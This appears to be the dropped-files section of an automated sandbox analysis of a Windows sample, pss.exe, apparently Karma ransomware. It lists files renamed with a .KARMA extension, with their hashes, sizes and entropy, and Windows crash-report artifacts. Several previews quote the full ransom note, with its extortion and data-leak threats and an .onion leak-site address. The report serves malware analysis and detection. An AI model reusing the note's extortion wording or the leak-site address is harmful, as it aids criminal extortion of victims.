SHA-512:002A2EE47189D7FB14EECCD86E2F69B22C6F20074478A399DCF4A198FC1BD7565D12DCEFC3F5676252A41360B2D03455157CDEE60B2B5181F30CDE7E0F9CD94F
Malicious:false
C:\Documents and Settings\user\Downloads\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813700938199611
Encrypted:false
SSDEEP:24:wjjbnBQHKU1oxpkpGUSSo28Nn4S6trwxVVtKO5GQJ108nE8Z/n:mvBQeSr8FI07VtKOwQpd9n
MD5:F75780716C030640E3D69A906F81D02A
SHA1:28AD1E628E486F0847042190520B452C17BE1E28
SHA-256:CA19B44953E34C0D15BB2753CB42D1B19C957A1DCED52FEDCBFB7787C4A69017
SHA-512:87347EA34B43550F1DC5D188DA52C6F9A0976A7052FE7EE7803907A264BB2FF93C7E986E75C654480948F12E8259C59FBBABBA021D68721F1B6128C33A3188A0
Malicious:false
C:\Documents and Settings\user\Downloads\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819531832052393
Encrypted:false
SSDEEP:24:qO2f7Q4FCFSFo5nz1oBO0geWj2OSoe9Dep:r2f7QlSOSVgV27oeJep
MD5:4B3A77FD6F64EA2D52A174F2F9234B25
SHA1:1B32EF66ED0A90D319DF97FA3D9122E6DB1127A9
SHA-256:750300689B8EC77436461C628E9CBE0C6562FE93711C88CE71D11ABE1828B308
SHA-512:DDBF8E0E2374EA85324D3A31A1E05AFE635DE0090BFE5F54382178548D33C7FBDA391C6679B665B09E48FF836BC53F3E31B838FCE58C5A59DAAF90B19AE40344
Malicious:false
C:\Documents and Settings\user\Downloads\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.823312150124047
Encrypted:false
SSDEEP:24:dBwOgv4J9eboIqV9j19c7lD03p+Ddl5TyVOFQDrAQqZjzijkGO4lb:HwOQenj1GlD0Z+X5TyVOFQDrXCa3O4J
MD5:A332AAFA835AB972B577AF88E80620E6
SHA1:0ADC96942ED6F66981B9976D69E9064A71946C97
SHA-256:17788D77E9DDF79DE5BE84BAE00154521394BC8DF9383D1072093BC494524750
SHA-512:C9DFA0736B0EF07D8FA8883E4237992CCDC19EF5DB55D21BB680C04F153205E176B5E99F87DFBBA663EAF99D808142454ACB29D46F6AD242141C3F4593907B15
Malicious:false
C:\Documents and Settings\user\Downloads\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.818448776663923
Encrypted:false
SSDEEP:24:55HZnV/5zDCvl/L6bHP5Npdd9vViZHVLMDi7xNh3PFwONnCk9RoEQo:555HaFL6bHP5NpVu1MoxNxF58o
MD5:BE5F06A51A2601F1D3477FAC6185815D
SHA1:00EAE340570F09B513439AC811F2E3AD52B7F2E0
SHA-256:944986A226F5B3081A7DD5D7B3583935ABB27B853E23085627B6CAC605D1B782
SHA-512:4B0755A4BC2FED0D6ABB17158F55205034B86C4914BE38BD2CDE111D5A38FF8FAE2617D962B0834EF876F35E5AFABB1F2D8F5566C2FDFCE715DF3BA9EDDE9368
Malicious:false
C:\Documents and Settings\user\Downloads\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.841143929859832
Encrypted:false
SSDEEP:24:aGSkg5iVPLAHfpIiOUhziETRn8u8c37ARqPR+HGeZMpFBZ2F9:a3OA/JOUhD5PAu+HGeqpnIF9
MD5:D46A6E9F9F7FA409B6C4DA4B03496D3A
SHA1:E4F3A65805A7FA5BD9659F7086230C11399BCF61
SHA-256:7E25A9536048F1F2ABCCD67113164379295A36522A299921BDF2690B38C32F17
SHA-512:5A7EEEB6F729C64848130B760B7A7AF8F49AD137E287F9DA94372CE2E510973136756D97C3A78F8A3044056515D4EC1262B6FAC391A34C6D4DBDD6EA5FA15E5B
Malicious:false
C:\Documents and Settings\user\Downloads\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.816065564803297
Encrypted:false
SSDEEP:24:f6J79gXrOc0bhIkKR8VJhUBtv7vuGP/XfpA5aT8nK9CxyKtNZpLKR:fGgbOs4Qtv77P/fpEaTj+Nt1E
MD5:781365153DF3C3016458644F53D3FC60
SHA1:45DDE3D366F2F6E074E857A34BF16B65FF989D8E
SHA-256:07433B072CEFC7E8BAF7DE4A02097879A8DA21EDC06AD5D1D1B253E7B7F04425
SHA-512:D08AED813271F1C9AC3E3B50A8FA57F5E5D784BDD6386CD149A6A89A466CF61EF447D159CF2815308E8FEA09F50D962D6477CC3D1969AC8B417884DBBB1B8C15
Malicious:false
C:\Documents and Settings\user\Downloads\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.810397506908055
Encrypted:false
SSDEEP:24:uwty4xyCtvc6GOnbdjvhbkj4jvLZp7WnS3pk+hEHaFdAtx:TXxyYvcSbdjvh4j4jvg8pdhEHaFdAtx
MD5:D3E065E36B769B39F7373F6C2BEA1F58
SHA1:86248099E8E14C0512C35B7301B8B56D8F09F9BA
SHA-256:1A23EB9B8422ED0337E6148447A9FD24E6B4F4FA14DA1206E6214F0AEA009844
SHA-512:3D32D6372F8D63705A15FED33BAE85B0D40A8F84AE1526B6A7B513A0AC56A3F6A3B5B87786ECCB556B2196F21CF6567433C502170B7A8EAEDE51146372414487
Malicious:false
C:\Documents and Settings\user\Downloads\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835493741139947
Encrypted:false
SSDEEP:24:ndV6oFMlzzTa6LozG9fmwRND/qifqhDzKMjnKh:vMlL7cXwnImyI
MD5:5540AE67DC608B71D03501EBC4D02F26
SHA1:4F8F9DB7221B0466D7679C90C9408F5413B89EB9
SHA-256:F5E0BD32FE2F8B5ED0DEDCC58E730C2DCB7F45D27AEADB379A6149793C2C9445
SHA-512:0F80A3E50E7C1B960D84CAB00D676A7B742D3C9A3758ED2288DC135697B73CDF6962B845B3E920FDE4EE5DC25069FA0E84A068AE507FBA8C70C3EAC27FBD090D
Malicious:false
C:\Documents and Settings\user\Downloads\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.804702290356976
Encrypted:false
SSDEEP:24:nGQNthQQdYnZsfylxrcCv75zEzFV4Jzfm86y9WFw5ObR:vNPpehd75zEJyJzfRr90w5Od
MD5:7569FAD3A9E5F3E3E7D9796CAB4E559E
SHA1:498BCBC52E4C4D3ECB0546A94AF0366905DCAC9D
SHA-256:5C51714A2E62FD53C60E1AEC743D3DD18EA26ACEDA19BA98EDAB9780EA3C6F2D
SHA-512:E698AB725C540043A0A3613AF4D7C6E7224C67FF74C62B484B2A181ED56EA2250F6A8D20ED3027B4C84DD6DC47DDD4DC8EC1D4841830A0400FB0ECD3CD846B47
Malicious:false
C:\Documents and Settings\user\Downloads\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819881850037968
Encrypted:false
SSDEEP:24:JenOriYL4UOgUECt/IYVtzkBSe79vUXYmQ4JiutHHzCYIXUbwQUu9:YOnLGP/DMaYmziu1zCNXUPX9
MD5:7D5D6349078AF3D48CFB8FDFA864D762
SHA1:FD24369A2A8ED088BA7D0BF85D8975B9AE3CEE64
SHA-256:BFAF42EB7B5FB395A162C359F012C987E761029A95B8F31D495C33AE3F1D2A61
SHA-512:45A861E7A0541A53DD02494B48792DFCFEF57514AA18E4F45CF68926FD20E1D1FBE0579C3120A5D6E4573DA16C389D66B45BBFE7210281E6B1B25070D9B5C407
Malicious:false
C:\Documents and Settings\user\Downloads\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835811565860034
Encrypted:false
SSDEEP:24:V1Ls12JzawKjQFxcUR6YrQvNCS7oLGjHAxUOK4iVwvNNiX:V1LX+kxc4KNxwGjlikwVNM
MD5:ABB83A271D244C6A0FE3FA248507B939
SHA1:25E5682EDF7F498EF6DE78D93F7FDF2CB7B86C34
SHA-256:02D35019B907AD429C9261B3C77101224C341D0A639B21F1FDE61423B1F81DA1
SHA-512:2A22AD9CC67692F1599B61A3483F5466F393CFAE0A9C69B686D3A61C98ED40AF686B245D1444E5763A40E861BD00B3330EA97FB628D08EAAD492E604926E3A3A
Malicious:false
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1104
Entropy (8bit):7.833501918420277
Encrypted:false
SSDEEP:24:TIVDAVPXXz0DnX99S2p/uTleXProN6wxEsfyD+Siri:TMIXXz0DX9bTXTCjtt1u
MD5:C075CBC6CD0DB76D0E54A50AAA7AD48E
SHA1:738FAD3E004732B245AAE9D5012E454BE9D59495
SHA-256:EB2E3A41F08BB097CF37F783D909C48DAE10E1307C5D6AB945E24B4FC3D3C26E
SHA-512:722390BE612354C468DB45A4E269A4C52FB7E2FC7ECD6535D5DF3ED4362615D14845EE851057CBA828D9CECA2BAC132A59AA7C373745F9992572631A59BCE470
Malicious:false
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):157512
Entropy (8bit):7.998769086932829
Encrypted:true
SSDEEP:3072:VYbYGZFS+qnsQJceqsrL3vSBW9SGE9SQDWbvCwkTdXQ+9Yb1497oeW:UYC47Jf1OB4P16RxXz6JqoeW
MD5:9D0136E2E308B459CB942A489D9392E8
SHA1:63A030EF9EA19CF9163EB21EC024D401982E5082
SHA-256:9F9FFE46679B2F0EA9C9CAD878166A7F7F39AD8EA8AF4FAE5DA0F9FBA5335AA9
SHA-512:614DC08EACDA0BA4408B89630E9A6AED1A692AB23E801A5CDF83C935FF777A20DBD5CEE03EC8BB3E765A137B1D5AF4AEBDF4785325CAFEE76E225913FA42F5BF
Malicious:true
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):9635
Entropy (8bit):7.984063932308583
Encrypted:false
SSDEEP:192:dRV5fpfyYzk3YeykePTpkHmhbndqvyihLhUIs954TN68XvAJa59vy8:dn5cYzp7pKGbnd+hLoexX/
MD5:397745A92FF84000407BC3F2C9B56452
SHA1:AD80530BB8C6792D62DE80C59D236CDFEE1AC505
SHA-256:17A8C50ACB84800BA3DA2964614332DCCC85A8DC70B66C68C186657EEFA43E30
SHA-512:CFF6C0EE11888D54F966757387C9BD24A0609F1D1F7CC6DC18434E0AAF4327974550F0036FA62FE649EBA9DB3DF18BC0413E6FBD6316EBDB47AB179B0BAC75C9
Malicious:false
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Sub-key -
Category:dropped
Size (bytes):245257
Entropy (8bit):7.99918756717482
Encrypted:true
SSDEEP:6144:rCL7CI70kgVL7sYUyieBt2C/lFFw6fGQqFzev:E+IYkORKC/lsXLFw
MD5:09C721B665625F7FCAD0A39245F574EA
SHA1:2814AC28DC8EE86D7E6089DFA4B9A9E696F2C68C
SHA-256:EBDFAFDEF0A3A9588BC989C6EB25FE77938444D7A4D0648E0C718E96DEB31571
SHA-512:47A976A42B103A4A9A691C57066D33E7C6C579C798251B74278CABCF57B2C9CFFB8F8EAC9D089AAA063ADA7C08DDFD422E712DC8DEB09C3E895F3F0E33F05AC7
Malicious:true
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\SharedDataEvents.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):12357
Entropy (8bit):7.985861124591946
Encrypted:false
SSDEEP:192:BnhMmmzAjR74li3+cdq3jF3T/9smDxNka74seUulWiEzS8yFn18R7vpo0Usmq:BnLmsjREliOcM3BsmDx2OXlYU0nq
MD5:67A2226F3D675963F6C4F0872FCFAEB8
SHA1:35956D1D6DA69147803AED5EBFAE5E75CCAA55C0
SHA-256:921CD359D0D81C2C9FF87AEFCD30DD4F21A96590889D2B72C9CAD283C4175001
SHA-512:22E5FCC7053DD294B2E500C42D8E3FA9DA9FA4BC385E40801E434E382AA02C2F924FD3D5E2A61F493DE539C5FED8CCEB0A46CC7DF451FDD2530101547DD5E609
Malicious:false
C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):63667
Entropy (8bit):7.996620789477532
Encrypted:true
SSDEEP:1536:Fu1xQ3f2ILT3eoJ7dgnqzOd8lKYMvD+QG80HV8cTfPl:FJje6JtzOucDN+WI
MD5:B7B7CE3755BF0B308E333B67A5F9EBDD
SHA1:760278EFDE110FFEB6632E6D8FE44CD18ED8CCF1
SHA-256:545EDAEE693796F2B6C1854FA8DA54AAF72A59461F4C61D5E5E6BE21DFFF98E0
SHA-512:7B47D6BA0630D8B4AFAEB480CBFDEC0EAAC0B5B0994A82DB26DAC436359FD29C6E03E78B419FB80DD34EBB34D5DEDC9EBAEB48A83E9C406251C0FA576FAAD2BE
Malicious:true
C:\Documents and Settings\user\Local Settings\Adobe\Color\ACECache11.lst.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):667
Entropy (8bit):7.7271977987515
Encrypted:false
SSDEEP:12:83g0djs8PKnM8np6k/BkbXDrxd8tibhueAWwUbrbspetdsb:83FY8PGnp6k/Bg8tCRwyKb
MD5:4C558D46A54E4FA0E189D1914FFECCE1
SHA1:357A1804950323DBDF39A619D94E374493768AC9
SHA-256:CA03CA6ABA9DAA9AD61C61409722613CE43F7DB61E8B7776FED1793DDA1C4AE4
SHA-512:E684C8055B624071C91227A2ECCDA58542AAA2031B57EF1F1E5182D50A0208AC6E8D19F1CE50772CFF56C6EE5044394F0EEADEF8D9E7BE965064ABD0E82DFF80
Malicious:false
C:\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_pss.exe_9d9b9d6a0718e924eb0f095ee5cf1fb21b8932f_762fa7ba_011a2308\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8710
Entropy (8bit):3.766398432195196
Encrypted:false
SSDEEP:96:SQfyJaKNDYiithEP7RfdpXIQcQ7lc67YecEFcw30s+HbHg/8BRTf3Oy1Vs4oc/N5:XuDYoHFlfJP4VjuL/u7sXS274ItE1t
MD5:B8ADAD7536D8C778C6A58D0AD4495E55
SHA1:D8298777AEE593E14A5D7B967B07F93C8E5D435C
SHA-256:ACCDF4A261B819254D73BA790CD7CFE20FAE4E77BBCFCD7375454AE997E2E054
SHA-512:2DB3A3CB146640B2B6E11CB0AF79A1A0ABD9904F4AE0F6F8758A2363FC1E3EC7A82230335EF3F08A1EEB5FF164BA9E4F5E52C0A44015A6DC09E77F09824451D2
Malicious:true
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.3.8.5.1.6.5.7.0.3.9.2.4.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.3.8.5.1.6.5.7.6.9.5.4.9.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.1.6.b.2.9.a.-.4.0.6.0.-.4.1.5.7.-.8.3.5.e.-.7.5.2.f.b.0.1.c.6.d.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.f.4.3.4.8.b.-.d.1.1.f.-.4.5.4.d.-.8.f.a.0.-.c.8.2.e.b.a.c.7.9.d.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.s.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.e.0.-.0.0.0.1.-.0.0.1.7.-.4.9.9.6.-.c.b.3.a.f.a.9.4.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.1.5.b.6.6.9.a.0.f.5.c.9.0.9.8.8.5.e.1.c.7.9.4.2.7.2.e.2.e.7.5.0.0.0.0.f.f.f.f.!.0.0.0.0.b.3.9.6.a.f.f.d.4.0.f.3.8.c.5.b.e.6.e.c.2.f.c.1.8.5.5.0.b.b.f.c.9.1.3.f.c.7.e.a.!.p.s.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C32.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Aug 19 13:00:57 2021, 0x1205a4 type
Category:dropped
Size (bytes):80230
Entropy (8bit):2.1464952898121417
Encrypted:false
SSDEEP:192:+gGgRuXMK1ow5/JUf/p73m4LL0xgdyaC5gOE4fi1ScN1KZi2Yxfhk31pMAiptWlF:DGbceomMOxgJC2OubNANYJy31OnpU3
MD5:D3C4974F11EE465F4C913E807E177413
SHA1:1114974B3E971A72B5D6CFA6606E55962B6D0728
SHA-256:5BE63D09C2CE7470EE94ECAA2D881721F00CF4C66235247D1F842BC54EAAE1E7
SHA-512:7AB74EB4E0158D8841677E04835D671FA0690631AD6D940E2555E35783009A3D2B98055884FCE644A919779CA1AF474B948D584C48F8C91B2D8CD2EE42ECD0B6
Malicious:false
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D8B.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8248
Entropy (8bit):3.6897956266787553
Encrypted:false
SSDEEP:192:Rrl7r3GLNivK6FS6YSFSUwNkngmfMSvu0CpD489brYsfJ5m:RrlsNiS6A6YASUokngmfMSWBrLfG
MD5:71CFED0E648F13A285EDF874AD790585
SHA1:66069F3A009714852563E957CC1FF3B809B9A51A
SHA-256:81A081FEFB5B126B4F1E4494F001C217B9036D55E47146A15EBF9894E8853479
SHA-512:5D46BD6D7B6DBD297E556348040B76B7D8F755B64D1FEB49AE00B41C5B68F42975DE9558AE72B19481A9FB882C7CA33DAE3F5DC96E02BD67EEC6A58EECA9830E
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.9.6.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E57.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4514
Entropy (8bit):4.41806856427765
Encrypted:false
SSDEEP:48:cvIwSD8zsUJgtWI9TTWSC8BBF8fm8M4JQm2F1+q8MgKM24d:uITfS8iSN2JQ/ih24d
MD5:6B2921A729289D4384CE63E9474FD525
SHA1:F328D50F4BBFAF8E11BC5AAF53DA35F0DFB9070F
SHA-256:196251C9E1F1F2F626F02067FD70C555F3B7E56B592E77F2D6C1F0E451B7FF4B
SHA-512:A1EC614DB34DAFDBAF590B74202558B7891F3F7022D1D833DFC8AF3D89B776D26C84EB1067427D659D1096744060936049E315E094816334801B0172E9FAAB7B
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1128851" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\Users\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\3D Objects\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1104
Entropy (8bit):7.833501918420277
Encrypted:false
SSDEEP:24:TIVDAVPXXz0DnX99S2p/uTleXProN6wxEsfyD+Siri:TMIXXz0DX9bTXTCjtt1u
MD5:C075CBC6CD0DB76D0E54A50AAA7AD48E
SHA1:738FAD3E004732B245AAE9D5012E454BE9D59495
SHA-256:EB2E3A41F08BB097CF37F783D909C48DAE10E1307C5D6AB945E24B4FC3D3C26E
SHA-512:722390BE612354C468DB45A4E269A4C52FB7E2FC7ECD6535D5DF3ED4362615D14845EE851057CBA828D9CECA2BAC132A59AA7C373745F9992572631A59BCE470
Malicious:false
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):157512
Entropy (8bit):7.998769086932829
Encrypted:true
SSDEEP:3072:VYbYGZFS+qnsQJceqsrL3vSBW9SGE9SQDWbvCwkTdXQ+9Yb1497oeW:UYC47Jf1OB4P16RxXz6JqoeW
MD5:9D0136E2E308B459CB942A489D9392E8
SHA1:63A030EF9EA19CF9163EB21EC024D401982E5082
SHA-256:9F9FFE46679B2F0EA9C9CAD878166A7F7F39AD8EA8AF4FAE5DA0F9FBA5335AA9
SHA-512:614DC08EACDA0BA4408B89630E9A6AED1A692AB23E801A5CDF83C935FF777A20DBD5CEE03EC8BB3E765A137B1D5AF4AEBDF4785325CAFEE76E225913FA42F5BF
Malicious:true
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):9635
Entropy (8bit):7.984063932308583
Encrypted:false
SSDEEP:192:dRV5fpfyYzk3YeykePTpkHmhbndqvyihLhUIs954TN68XvAJa59vy8:dn5cYzp7pKGbnd+hLoexX/
MD5:397745A92FF84000407BC3F2C9B56452
SHA1:AD80530BB8C6792D62DE80C59D236CDFEE1AC505
SHA-256:17A8C50ACB84800BA3DA2964614332DCCC85A8DC70B66C68C186657EEFA43E30
